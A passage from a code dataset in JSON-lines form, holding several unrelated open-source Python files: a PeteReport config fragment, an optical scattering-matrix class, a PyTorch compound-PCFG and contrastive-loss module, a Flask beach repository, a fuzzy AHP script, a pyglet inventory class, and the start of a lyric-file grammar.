'titlepage-text-color': \"000000\",\n    'titlepage-rule-color': \"cc0000\",\n    'titlepage-rule-height': 2\n}\n\nPETEREPORT_MARKDOWN = {\n    'pdf_engine': env.str('PETEREPORT_PDF_ENGINE', default='pdflatex'), # pdflatex or xelatex\n    'martor_upload_method': env.str('PETEREPORT_MARTOR_UPLOAD_METHOD', default='BASE64'), # BASE64 (stored in DB) or MEDIA (path not protected, must be set 'debug': True. This is highly insecure and not encouraged for production use. The web server (apache, nginx, etc.) should be configured to serve the media content using a protected link)\n    'media_host': env.str('PETEREPORT_MEDIA_HOST', default='http://localhost:8000/') # If docker deployment, set https://, else for django deployment http://:8000\n}","repo_name":"1modm/petereport","sub_path":"app/config/petereport_config.py","file_name":"petereport_config.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"61"}
+{"seq_id":"37201972661","text":"import numpy as np\nimport scipy.linalg as linalg\n\nclass S_matrix:\n    \"\"\"Implementation of the scattering matrix object\n    \n    This object is a container for NxN matrices, conventionally defined as S11, S12, S21 and S22\n    Also, it implements all the methods involving operations on scattering matrices\n    \"\"\"\n\n    def __init__(self,N):\n        \"\"\"Constructor\n        \n        Args:\n            N (int): Dimension of each of the NxN submatrices of the scattering matrix. The total matrix is 2Nx2N\n\n        Returns:\n            None.\n\n        \"\"\"\n        self.N=N\n        self.S11=np.identity(N,complex)\n        self.S22=np.identity(N,complex)\n        self.S12=np.zeros((N,N),complex)\n        self.S21=np.zeros((N,N),complex)\n\n\n    #OLD RECURSION VERSION\n    #def add(self,s):\n    #    T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S11)\n    #    T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S21,self.S12)),s.S22)\n    #    self.S11=np.dot(s.S11,T1)\n    #    self.S12=s.S12+np.dot(np.dot(s.S11,self.S12),T2)\n    #    self.S21=self.S21+np.dot(np.dot(self.S22,s.S21),T1)\n    #    self.S22=np.dot(self.S22,T2)\n\n    #NEW RECURSION VERSION\n    def add(self,s):\n        \"\"\"Recursion method for joining two scattering matrices\n        \n        The connection is between the \"right\" side of self and the \"left\" side of s\n        \n        Args:\n            s (S_matrix): scattering matrix to be joined to self.\n\n        Returns:\n            None.\n\n        \"\"\"\n        I=np.identity(self.N,complex)\n        T1=np.dot(s.S11,linalg.inv(I-np.dot(self.S12,s.S21)))\n        T2=np.dot(self.S22,linalg.inv(I-np.dot(s.S21,self.S12)))\n        self.S21=self.S21+np.dot(np.dot(T2,s.S21),self.S11)\n        self.S11=np.dot(T1,self.S11)\n        self.S12=s.S12 +np.dot(np.dot(T1,self.S12),s.S22) \n        self.S22=np.dot(T2,s.S22)\n\n    def add_left(self,s):\n        \"\"\"Recursion method for joining two scattering matrices\n        \n        The connection is between the \"left\" side of self and the \"right\" side of s\n        \n        Args:\n            s (S_matrix): scattering matrix to be joined to self.
\n\n        Returns:\n            None.\n\n        \"\"\"\n        T1=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(s.S12,self.S21)),s.S11)\n        T2=np.dot(linalg.inv(np.identity(self.N,complex)-np.dot(self.S12,s.S21)),self.S22)\n        s.S11=np.dot(self.S11,T1)\n        s.S12=self.S12+np.dot(np.dot(self.S11,s.S12),T2)\n        s.S21=s.S21+np.dot(np.dot(s.S22,self.S21),T1)\n        s.S22=np.dot(s.S22,T2)\n\n    def add_uniform(self,lay,d):\n        \"\"\"Recursion method for adding to self the propagation matrix of a given layer\n        \n        The connection is between the \"right\" side of self and the \"left\" side of the propagation matrix \n\n        Args:\n            lay (Layer): Layer of which to calculate the propagation matrix\n            d (float): Thickness of the layer\n\n        Returns:\n            None.\n\n        \"\"\"\n        E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))\n        self.S11=np.dot(E,self.S11)\n        self.S12=np.dot(E,np.dot(self.S12,E))\n        self.S22=np.dot(self.S22,E)\n\n    def add_uniform_left(self,lay,d):\n        \"\"\"Recursion method for adding to self the propagation matrix of a given layer\n        \n        The connection is between the \"left\" side of self and the \"right\" side of the propagation matrix \n\n        Args:\n            lay (Layer): Layer of which to calculate the propagation matrix\n            d (float): Thickness of the layer\n\n        Returns:\n            None.\n\n        \"\"\"\n        E=np.diag(np.exp((0+2j)*np.pi*lay.k0*lay.gamma*d))\n        self.S11=np.dot(self.S11,E)\n        self.S21=np.dot(E,np.dot(self.S21,E))\n        self.S22=np.dot(E,self.S22)\n\n\n    def S_print(self,i=None,j=None):\n        \"\"\"Function for printing the scattering matrix. \n        \n        It can print both the full matrix or the 2x2 matrix between relevant modes\n\n        Args:\n            i (int, optional): index of the \"left\" mode. Default is None (full matrix)\n            j (int, optional): index of the \"right\" mode. Default is None (full matrix)\n\n        Returns:\n            None.\n\n        \"\"\"\n        if i==None:\n            S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])\n        else:\n            j=i if j==None else j\n            S=np.vstack([np.hstack([self.S11[i,j],self.S12[i,j]]),np.hstack([self.S21[i,j],self.S22[i,j]])])\n        print(S)\n\n    def det(self):\n        \"\"\"Calculate the determinant of the scattering matrix\n\n        Returns:\n            float: Determinant of the scattering matrix\n\n        \"\"\"\n        return linalg.det(np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])]))\n\n    def S_modes(self):\n        \"\"\"Solves the eigenvalue problem of the Bloch modes of the scattering matrix\n        \n        Returns:\n            W (1darray): arrays of the eigenvalues (complex amplitude of the mode after one period)\n            V (2darray): arrays of the eigenvectors (Bloch modes on the base of the guided mode in the first and last layer)\n\n        \"\"\"\n        ID=np.identity(self.N)\n        Z=np.zeros((self.N,self.N))\n        S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])\n        S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])\n        [W,V]=linalg.eig(S1,b=S2)\n        return W,V\n\n    def det_modes(self,kz,d):\n        \"\"\"Determinant det(S1-exp(1j*kz*d)*S2) whose zeros correspond to Bloch modes with wavevector kz over a period of length d\"\"\"\n        ID=np.identity(self.N)\n        Z=np.zeros((self.N,self.N))\n        S1=np.vstack([np.hstack([self.S11,Z]),np.hstack([self.S21,-ID])])\n        S2=np.vstack([np.hstack([ID,-self.S12]),np.hstack([Z,-self.S22])])\n        return linalg.det(S1-np.exp((0.0+1.0j)*kz*d)*S2) \n\n    def der(self,Sm,Sp,h=0.01):\n        \"\"\"Calculates the first and second derivative of the scattering matrix with respect to the parameter par.\n\n        Args:\n            Sm (S_matrix): S matrix calculated at par=par0-h\n            Sp (S_matrix): S matrix calculated at par=par0+h\n            h (float, optional): Interval used to calculate the derivatives. 
Defaults to 0.01.\n\n        Returns:\n            tuple: tuple containing:\n            \n                - S1 (2darray): First derivative of the scattering matrix with respect to par.\n                - S2 (2darray): Second derivative of the scattering matrix with respect to par.\n\n        \"\"\"\n        S=np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])\n        S_m=np.vstack([np.hstack([Sm.S11,Sm.S12]),np.hstack([Sm.S21,Sm.S22])])\n        S_p=np.vstack([np.hstack([Sp.S11,Sp.S12]),np.hstack([Sp.S21,Sp.S22])])\n        S1=(S_p-S_m)/(2.0*h)\n        S2=(S_p+S_m-2.0*S)/(h*h)\n        return (S1,S2)\n\n    def matrix(self):\n        \"\"\"Returns the full scattering matrix\n        \n        Returns:\n            2darray: Scattering matrix as numpy array\n\n        \"\"\"\n        return np.vstack([np.hstack([self.S11,self.S12]),np.hstack([self.S21,self.S22])])\n\n    def output(self,u1,d2):\n        \"\"\"Returns the output vectors given the input vectors\n\n        Args:\n            u1 (1darray): Array of modal coefficient of \"left\" inputs.\n            d2 (1darray): Array of modal coefficient of \"right\" inputs.\n\n        Returns:\n            tuple: tuple containing:\n            \n                - u2 (1darray): Array of modal coefficient of \"right\" outputs.\n                - d1 (1darray): Array of modal coefficient of \"left\" outputs.\n\n        \"\"\"\n        u2=np.add(np.dot(self.S11,u1),np.dot(self.S12,d2))\n        d1=np.add(np.dot(self.S21,u1),np.dot(self.S22,d2))\n        return (u2,d1)\n\n    def left(self,u1,d1):\n        \"\"\"Return the \"right\" input and output vectors given the \"left\" ones\n        \n\n        Args:\n            u1 (1darray): Array of modal coefficient of \"left\" inputs.\n            d1 (1darray): Array of modal coefficient of \"left\" outputs.\n\n        Returns:\n            tuple: tuple containing:\n            \n                - u2 (1darray): Array of modal coefficient of \"right\" outputs.\n                - d2 (1darray): Array of modal coefficient of \"right\" inputs.\n\n        \"\"\"\n        d2=linalg.solve(self.S22,d1-np.dot(self.S21,u1))\n        u2=np.add(np.dot(self.S11,u1),np.dot(self.S12,d2)) # u2 = S11*u1 + S12*d2\n        return (u2,d2)\n\n    def int_f(self,S2,u):\n        \"\"\"Return the modal coefficients between two scattering matrices (self and S2)\n\n        Args:\n            S2 (S_matrix): Scattering matrix between self and the end of the structure\n            u (1darray): Array of modal coefficient of \"left\" inputs to self.\n\n        Returns:\n            tuple: tuple containing:\n            \n                - uo (TYPE): Array of coefficients of left-propagating modes in the middle \n                - do (TYPE): Array of coefficients of right-propagating modes in the middle\n\n        \"\"\"\n        ID=np.identity(self.N)\n        ut=np.dot(self.S11,u)\n        uo=linalg.solve(ID-np.dot(self.S12,S2.S21),ut)\n        do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.dot(S2.S21,ut))\n        return (uo,do)\n\n    def int_f_tot(self,S2,u,d):\n        \"\"\"Return the modal coefficients between two scattering matrices (self and S2)\n\n        Args:\n            S2 (S_matrix): Scattering matrix between self and the end of the structure\n            u (1darray): Array of modal coefficient of \"left\" inputs to self.\n            d (1darray): Array of modal coefficient of \"right\" inputs to S2\n\n        Returns:\n            tuple: tuple containing:\n            \n                - uo (TYPE): Array of coefficients of left-propagating modes in the middle \n                - do (TYPE): Array of coefficients of right-propagating modes in the middle\n\n        \"\"\"\n        ID=np.identity(self.N)\n        ut=np.dot(self.S11,u)\n        dt=np.dot(S2.S22,d)\n        uo=linalg.solve(ID-np.dot(self.S12,S2.S21),np.add(ut,np.dot(self.S12,dt)))\n        do=linalg.solve(ID-np.dot(S2.S21,self.S12),np.add(np.dot(S2.S21,ut),dt))\n        return (uo,do)\n\n    int_complete = int_f_tot\n    \n\n\n\n\n","repo_name":"mpasson/A_FMM","sub_path":"A_FMM/scattering.py","file_name":"scattering.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"13396911747","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pad_packed_sequence, pack_padded_sequence\nfrom core.config import cfg as config\nfrom dataset.datasets.pentathlon_dataset import UNK\n\nclass ResLayer(torch.nn.Module):\n def __init__(self, in_dim, out_dim):\n super(ResLayer, self).__init__()\n self.linear = nn.Sequential(\n nn.Linear(in_dim, out_dim),\n nn.ReLU(),\n nn.Linear(out_dim, out_dim),\n nn.ReLU()\n )\n\n def forward(self, x):\n return self.linear(x) + x\n\nclass CompoundCFG(nn.Module):\n def __init__(self, V, NT, T,\n h_dim=512,\n w_dim=512,\n z_dim=64,\n s_dim=256):\n super(CompoundCFG, self).__init__()\n assert z_dim >= 0\n self.NT_T = NT + T\n self.NT = NT\n self.T = T\n self.z_dim = z_dim\n self.s_dim = s_dim\n\n self.root_emb = nn.Parameter(torch.randn(1, s_dim))\n self.term_emb = nn.Parameter(torch.randn(T, s_dim))\n self.nonterm_emb = nn.Parameter(torch.randn(NT, s_dim))\n\n self.rule_mlp = nn.Linear(s_dim + z_dim, self.NT_T ** 2)\n self.root_mlp = nn.Sequential(nn.Linear(s_dim + z_dim, s_dim),\n ResLayer(s_dim, s_dim),\n ResLayer(s_dim, s_dim),\n nn.Linear(s_dim, NT))\n self.term_mlp = nn.Sequential(nn.Linear(s_dim + z_dim, s_dim),\n ResLayer(s_dim, s_dim),\n ResLayer(s_dim, s_dim),\n nn.Linear(s_dim, V))\n if z_dim > 0:\n self.enc_emb = nn.Embedding(V, w_dim)\n self.enc_rnn = nn.LSTM(w_dim, h_dim, bidirectional=True, num_layers=1, batch_first=True)\n self.enc_out = nn.Linear(h_dim * 2, z_dim * 2)\n\n def update_state_dict(self, new_state, strict=True):\n self.load_state_dict(new_state, strict=strict)\n\n def kl(self, mean, lvar):\n return -0.5 * (lvar - torch.pow(mean, 2) - torch.exp(lvar) + 1)\n\n def enc(self, x, l):\n x_embbed = self.enc_emb(x)\n self.enc_rnn.flatten_parameters()\n packed_x_embbed = pack_padded_sequence(x_embbed, l, batch_first=True, enforce_sorted=False)\n h, _ = self.enc_rnn(packed_x_embbed)\n unpacked_h = pad_packed_sequence(h, batch_first=True, padding_value=float('-inf'))[0]\n out = self.enc_out(unpacked_h.max(1)[0])\n\n mean = out[:, : self.z_dim]\n lvar = out[:, self.z_dim:]\n return mean, lvar\n\n def forward(self, x, l):\n b, n = x.shape[:2]\n if self.z_dim > 0:\n mean, lvar = self.enc(x, l)\n kl = self.kl(mean, lvar).sum(1)\n z = mean\n if self.training: # NOTE: use mean value during evaluation\n z = mean.new(b, mean.size(1)).normal_(0, 1)\n z = (0.5 * lvar).exp() * z + mean\n else:\n z = torch.zeros(b, 1).cuda()\n kl = None\n self.z = z\n\n def roots():\n root_emb = self.root_emb.expand(b, self.s_dim)\n if self.z_dim > 0:\n root_emb = torch.cat([root_emb, self.z], -1)\n root_prob = F.log_softmax(self.root_mlp(root_emb), -1)\n return root_prob\n\n def terms():\n term_emb = self.term_emb.unsqueeze(0).unsqueeze(1).expand(\n b, n, self.T, self.s_dim\n )\n if self.z_dim > 0:\n z_expand = self.z.unsqueeze(1).unsqueeze(2).expand(\n b, n, self.T, self.z_dim\n )\n term_emb = torch.cat([term_emb, z_expand], -1)\n term_prob = F.log_softmax(self.term_mlp(term_emb), -1)\n indices = x.unsqueeze(2).expand(b, n, self.T).unsqueeze(3)\n term_prob = torch.gather(term_prob, 3, indices).squeeze(3)\n return term_prob\n\n def rules():\n nonterm_emb = self.nonterm_emb.unsqueeze(0).expand(\n b, self.NT, self.s_dim\n )\n if self.z_dim > 0:\n z_expand = self.z.unsqueeze(1).expand(\n b, self.NT, self.z_dim\n )\n nonterm_emb = torch.cat([nonterm_emb, z_expand], -1)\n rule_prob = F.log_softmax(self.rule_mlp(nonterm_emb), -1)\n rule_prob = rule_prob.view(b, self.NT, self.NT_T, 
self.NT_T)\n return rule_prob\n\n roots_ll, terms_ll, rules_ll = roots(), terms(), rules()\n return (terms_ll, rules_ll, roots_ll), kl\n\nclass ImageEncoder(nn.Module):\n def __init__(self, cfg):\n super(ImageEncoder, self).__init__()\n self.no_imgnorm = cfg.no_imgnorm\n in_dim = sum([getattr(cfg, '{}_dim'.format(key)) for key in config.DATASET.EXPERTS])\n self.fc = nn.Linear(in_dim, cfg.sem_dim)\n\n def forward(self, *images):\n images = torch.cat(images, dim=-1).squeeze(1)\n features = self.fc(images)\n if not self.no_imgnorm:\n features = F.normalize(features, dim=-1)\n return features\n\nclass TextEncoder(torch.nn.Module):\n def __init__(self, cfg):\n super(TextEncoder, self).__init__()\n self.NT = cfg.nt_states\n self.sem_dim = cfg.sem_dim\n self.syn_dim = cfg.syn_dim\n self.enc_rnn = torch.nn.LSTM(cfg.word_dim, cfg.lstm_dim, bidirectional=True, num_layers=1, batch_first=True)\n self.enc_out = torch.nn.Linear( cfg.lstm_dim * 2, self.NT * self.sem_dim)\n self.enc_emb = torch.nn.Embedding(len(cfg.word2int), cfg.word_dim, padding_idx=UNK)\n\n def _forward_srnn(self, x_emb, lengths):\n \"\"\"\n lstm over every span, a.k.a. segmental rnn\n \"\"\"\n b, N, dim = x_emb.size()\n word_mask = torch.arange(0, N, device=x_emb.device).unsqueeze(0).expand(b, N).long()\n max_len = lengths.unsqueeze(-1).expand_as(word_mask)\n word_mask = word_mask < max_len\n word_vect = x_emb * word_mask.unsqueeze(-1)\n feats = torch.zeros(b, int(N * (N - 1) / 2), self.NT, self.sem_dim, device=x_emb.device)\n beg_idx = 0\n for k in range(1, N):\n inc = torch.arange(N - k, device=x_emb.device).view(N - k, 1) # .expand(N - k, k + 1)\n idx = torch.arange(k + 1, device=x_emb.device).view(1, k + 1).repeat(N - k, 1)\n idx = (idx + inc).view(-1)\n idx = idx.unsqueeze(0).unsqueeze(-1).expand(b, -1, dim)\n\n feat = torch.gather(word_vect, 1, idx)\n feat = feat.view(b, N - k, k + 1, dim)\n feat = feat.view(-1, k + 1, dim)\n self.enc_rnn.flatten_parameters()\n feat = self.enc_out(self.enc_rnn(feat)[0])\n feat = feat.view(b, N - k, k + 1, self.NT, self.sem_dim)\n feat = F.normalize(feat.sum(2), dim=-1)\n end_idx = beg_idx + N - k\n feats[:, beg_idx: end_idx] = feat\n beg_idx = end_idx\n return feats\n\n def forward(self, captions, caption_lengths):\n word_emb = self.enc_emb(captions)\n return self._forward_srnn(word_emb, caption_lengths.cuda())\n\n\nclass ContrastiveLoss(torch.nn.Module):\n def __init__(self, margin=0):\n super(ContrastiveLoss, self).__init__()\n self.min_val = 1e-8\n self.margin = margin\n\n def forward(self, vid, txt):\n scores = vid.mm(txt.t()) # cosine similarity\n diagonal = scores.diag().view(vid.size(0), 1)\n d1 = diagonal.expand_as(scores)\n d2 = diagonal.t().expand_as(scores)\n\n loss_txt = (self.margin + scores - d1).clamp(min=self.min_val)\n loss_img = (self.margin + scores - d2).clamp(min=self.min_val)\n I = torch.eye(scores.size(0)) > .5\n if torch.cuda.is_available():\n I = I.cuda()\n loss_txt = loss_txt.masked_fill_(I, 0)\n loss_img = loss_img.masked_fill_(I, 0)\n\n loss_txt = loss_txt.mean(1)\n loss_img = loss_img.mean(0)\n return loss_txt + loss_img\n\nclass MixedContrastiveLoss(torch.nn.Module):\n def __init__(self, cfg):\n super(MixedContrastiveLoss, self).__init__()\n self.min_val = 1e-8\n self.gated_emb = GatedEmbedding(cfg)\n self.weight_predictor = nn.Sequential(nn.Linear(cfg.sem_dim, len(config.DATASET.EXPERTS)), nn.Softmax(dim=-1))\n self.margin = cfg.margin\n\n def forward(self, vid, txt):\n\n w = self.weight_predictor(txt)\n txt = self.gated_emb(txt)\n scores = 
torch.sum(w.t()[...,None]*vid.permute(1,0,2).bmm(txt.permute(1,2,0)), dim=0)\n diagonal = scores.diag().view(vid.size(0), 1)\n d1 = diagonal.expand_as(scores)\n d2 = diagonal.t().expand_as(scores)\n\n loss_txt = (self.margin + scores - d1).clamp(min=self.min_val)\n loss_img = (self.margin + scores - d2).clamp(min=self.min_val)\n\n I = torch.eye(scores.size(0)) > .5\n if torch.cuda.is_available():\n I = I.cuda()\n loss_txt = loss_txt.masked_fill_(I, 0)\n loss_img = loss_img.masked_fill_(I, 0)\n\n loss_txt = loss_txt.mean(1)\n loss_img = loss_img.mean(0)\n return loss_txt + loss_img, w\n\nclass GatedEmbedding(nn.Module):\n def __init__(self, cfg):\n super(GatedEmbedding, self).__init__()\n self.gated_embeddings = nn.ModuleList()\n for expert in config.DATASET.EXPERTS:\n self.gated_embeddings.append(nn.Linear(cfg.sem_dim, cfg.sem_dim))\n\n def forward(self, captions):\n outs = []\n for linear in self.gated_embeddings:\n z = linear(captions)\n z = z * torch.sigmoid(z)\n z = F.normalize(z, dim=-1)\n outs.append(z)\n outs = torch.stack(outs, dim=1)\n return outs\n\nfrom .position_encoding import build_position_encoding\nfrom .transformer import TransformerEncoder, TransformerEncoderLayer\nclass MultiModalTransformer(nn.Module):\n def __init__(self, cfg):\n super(MultiModalTransformer, self).__init__()\n self.cfg = cfg\n self.video_embeddings = nn.ModuleList()\n for expert in config.DATASET.EXPERTS:\n self.video_embeddings.append(nn.Linear(cfg.get(\"{}_dim\".format(expert)), cfg.sem_dim))\n\n self.expert_embedding = nn.Embedding(len(config.DATASET.EXPERTS), cfg.sem_dim)\n self.position_embedding = build_position_encoding(cfg)\n\n encoder_layer = TransformerEncoderLayer(cfg.sem_dim, cfg.nhead, normalize_before=cfg.normalize_before)\n encoder_norm = nn.LayerNorm(cfg.sem_dim) if cfg.normalize_before else None\n self.encoder = TransformerEncoder(encoder_layer, cfg.num_encoder_layers, encoder_norm)\n\n def forward(self, *videos):\n # videos listed as ['appearance', 'motion', 'audio', 'scene', 'ocr', 'face', 'speech']\n features = []\n expert_ids = []\n for i, (linear, feat) in enumerate(zip(self.video_embeddings, videos)):\n features.append(linear(feat))\n expert_ids.append(torch.full(feat.shape[:2], i, dtype=torch.long, device=feat.device))\n features = torch.cat(features, dim=1)\n expert_ids = torch.cat(expert_ids, dim=1)\n expert_embeddings = self.expert_embedding(expert_ids)\n\n position_embeddings = torch.cat([self.position_embedding(\n features, torch.zeros(v.shape[:2], dtype=torch.long, device=features.device)) for v in videos], dim=1)\n output = self.encoder(features.permute(1,0,2), pos=expert_embeddings.permute(1,0,2)+position_embeddings.permute(1,0,2))\n\n # Handle avg+fixed_seg\n if len(videos) != len(output):\n indexes = torch.cumsum(torch.tensor([0]+[v.shape[1] for v in videos[:-1]], dtype=torch.long, device=output.device), dim=0)\n output = output.index_select(0, indexes)\n output = output.permute(1, 0, 2)\n return output","repo_name":"Sy-Zhang/MMC-PCFG","sub_path":"lib/model/vpcfg/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"61"} +{"seq_id":"13181063399","text":"from api.models.beach import Beach\nfrom api import db\n\n\nclass BeachRepository:\n\n @staticmethod\n def get_all_beaches():\n try:\n return Beach.query.all()\n except:\n return []\n\n @staticmethod\n def add_beach(beach):\n try:\n db.session.add(beach)\n db.session.commit()\n except Exception as err:\n 
print(err)\n            return False\n        return True\n\n    @staticmethod\n    def delete_beach(id):\n        try:\n            Beach.query.filter_by(id=id).delete()\n            db.session.commit()\n        except:\n            return False\n        return True\n\n    @staticmethod\n    def cambiar_ocupacion_actual(playa_id, ocupacion):\n        try:\n            beach = Beach.query.filter_by(playa_id=playa_id).one()\n            beach.ocupacion_actual = ocupacion\n            db.session.commit()\n        except Exception as e:\n            print(e)\n            return False\n        return True\n\n    @staticmethod\n    def get_beach_by_playa_id(playa_id):\n        try:\n            return Beach.query.filter_by(playa_id=playa_id).one()\n        except:\n            return None\n\n    @staticmethod\n    def get_beach_by_id(id):\n        try:\n            return Beach.query.get(id)\n        except:\n            return None\n\n    @staticmethod\n    def get_beach_by_nombre_concejo(nombre, concejo):\n        try:\n            return Beach.query.filter_by(nombre=nombre, concejo=concejo).one()\n        except:\n            return None\n    \"\"\"\n    @staticmethod\n    def cambiar_ocupacion_actual(id, ocupacion):\n        try:\n            beach = Beach.query.get(id)\n            beach.ocupacion_actual = ocupacion\n            db.session.commit()\n        except:\n            return False\n        return True\n    \"\"\"","repo_name":"antonioalfa22/sig-playas-asturias","sub_path":"sig-backend/api/repository/beach_repository.py","file_name":"beach_repository.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"147483529","text":"import numpy as np\n\nfrom collections import defaultdict\n\n# Function to compute the fuzzy average\ndef fuzzy_aggregate(matrix):\n    # Compute the column-wise mean of the matrix\n    return np.mean(matrix, axis=0)\n\n# Function to compute the normalized fuzzy weights\ndef normalize_weights(w_aggregate):\n    normalized_weights = defaultdict(float)\n    \n    # Sum of the means at the fuzzy level (second row of the triplet)\n    total_weights = np.sum(w_aggregate[1])\n    for index, weight in enumerate(w_aggregate[1]):\n        normalized_weights[f'criteria{index + 1}'] = weight / total_weights\n    return normalized_weights\n\n# Create the 'fuzzy' pairwise comparison matrix\nfuzzy_matrix = np.array([\n    [(1, 1, 1), (1/2, 2/3, 1)],\n    [(1, 3/2, 2), (1, 1, 1)]\n])\n\n# Compute the fuzzy average and normalize the weights\nfuzzy_weighted_average = fuzzy_aggregate(fuzzy_matrix)\nnormalized_fuzzy_weights = normalize_weights(fuzzy_weighted_average)\nprint(\"Fuzzy average: \", fuzzy_weighted_average)\nprint(\"Normalized fuzzy weights: \", dict(normalized_fuzzy_weights))","repo_name":"TienLe0305/Internship-19-10-2023","sub_path":"Python/fahp.py","file_name":"fahp.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70597851075","text":"from pyglet import shapes\nimport pyglet\nimport resources\nfrom enum import Enum\n\n\nclass InventorySprite(pyglet.sprite.Sprite):\n    \"\"\" A health bar sprite \"\"\"\n\n    def __init__(self, x, y, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        self.x = x\n        self.y = y\n\n\nclass Inventory:\n    \"\"\" An object for inventory item sprites and shapes \"\"\"\n\n    def __init__(\n        self,\n        batch,\n        foreground_underlay_layer,\n        foreground_layer,\n        foreground_overlay_layer,\n    ):\n\n        self.batch = batch\n        self.foreground_underlay_layer = foreground_underlay_layer\n        self.foreground_layer = foreground_layer\n        self.foreground_overlay_layer = foreground_overlay_layer\n        self.health_hearts = self.create_health_hearts()\n        self.create_health_potion_counter()\n\n    def create_health_hearts(self):\n\n        tile_size = 32\n        heart_y = tile_size * 22.5\n        self.health_holder = 
InventorySprite(\n tile_size * 11,\n tile_size * 22,\n img=resources.heart_holder,\n batch=self.batch,\n group=self.foreground_underlay_layer,\n )\n\n # Create the empty heart that will go behind the filled hearts\n self.health_heart_empty1 = InventorySprite(\n tile_size * 11.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty2 = InventorySprite(\n tile_size * 13.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty3 = InventorySprite(\n tile_size * 15.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty4 = InventorySprite(\n tile_size * 17.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_heart_empty5 = InventorySprite(\n tile_size * 19.5,\n heart_y,\n img=resources.health_bar_heart_empty,\n batch=self.batch,\n group=self.foreground_layer,\n )\n\n health_hearts = []\n\n # Create the filled hearts that represent a health point\n health_heart1 = InventorySprite(\n tile_size * 11.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart2 = InventorySprite(\n tile_size * 13.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart3 = InventorySprite(\n tile_size * 15.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart4 = InventorySprite(\n tile_size * 17.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n health_heart5 = InventorySprite(\n tile_size * 19.5,\n heart_y,\n img=resources.health_bar_heart,\n batch=self.batch,\n group=self.foreground_overlay_layer,\n )\n\n health_hearts.append(health_heart1)\n health_hearts.append(health_heart2)\n health_hearts.append(health_heart3)\n health_hearts.append(health_heart4)\n health_hearts.append(health_heart5)\n\n return health_hearts\n\n def create_health_potion_counter(self):\n\n tile_size = 32\n\n self.backpack_inventory = InventorySprite(\n tile_size * 30,\n tile_size * 22,\n img=resources.backpack_inventory,\n batch=self.batch,\n group=self.foreground_underlay_layer,\n )\n self.health_potion_sprite = InventorySprite(\n tile_size * 30.5,\n tile_size * 22.5,\n img=resources.health_potion,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_potion_counter = pyglet.text.Label(\n \"\",\n font_name=\"Arial\",\n font_size=10,\n x=self.health_potion_sprite.x + 28,\n y=self.health_potion_sprite.y - 4,\n batch=self.batch,\n group=self.foreground_layer,\n )\n self.health_potion_sprite.visible = False\n\n def update_inventory(self, value, inventory_type):\n if inventory_type == inventory_type.HEALTH:\n self.update_health(value)\n elif inventory_type == inventory_type.HEALING_POTIONS:\n self.update_potions(value)\n\n # Update the health bar to the new health. 
Health is assumed to be based on 100 max health.\n def update_health(self, new_health):\n # Go through all of the hearts and change the image to an empty heart for any that represent health higher than what the player has.\n for index, obj in enumerate(self.health_hearts):\n if (new_health - 1) < index:\n obj.visible = False\n else:\n obj.visible = True\n\n def update_potions(self, new_potions_count):\n\n self.health_potion_counter.text = str(new_potions_count)\n\n if new_potions_count == 0:\n self.health_potion_counter.text = \"\"\n self.health_potion_sprite.visible = False\n else:\n self.health_potion_counter.text = str(new_potions_count)\n self.health_potion_sprite.visible = True\n\n\nclass InventoryType(Enum):\n HEALTH = 1\n HEALING_POTIONS = 2\n","repo_name":"JayMil/GameJam","sub_path":"src/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28908116116","text":"from functools import partial\nfrom typing import Optional\n\nfrom textx import LanguageDesc, metamodel_from_str\n\nfrom libresvip.model.base import BaseModel\n\ngrammar = \"\"\"\nLyricFile:\n info_tags*=InfoTag\n lyric_lines+=LyricLine\n;\nLineBreak: '\\r'? '\\n';\nTag: /[a-zA-Z]+/;\nWord: /[^\\r\\n]*?/;\nTimeTag: '[' minute=INT ':' second=INT '.' percent_second=INT ']';\nLyricLine: time_tags+=TimeTag lyric?=Word LineBreak;\nInfoTag: '[' key=Tag ':' value=Word ']' LineBreak;\n\"\"\"\n\n\nclass TimeTag(BaseModel):\n minute: int\n second: int\n 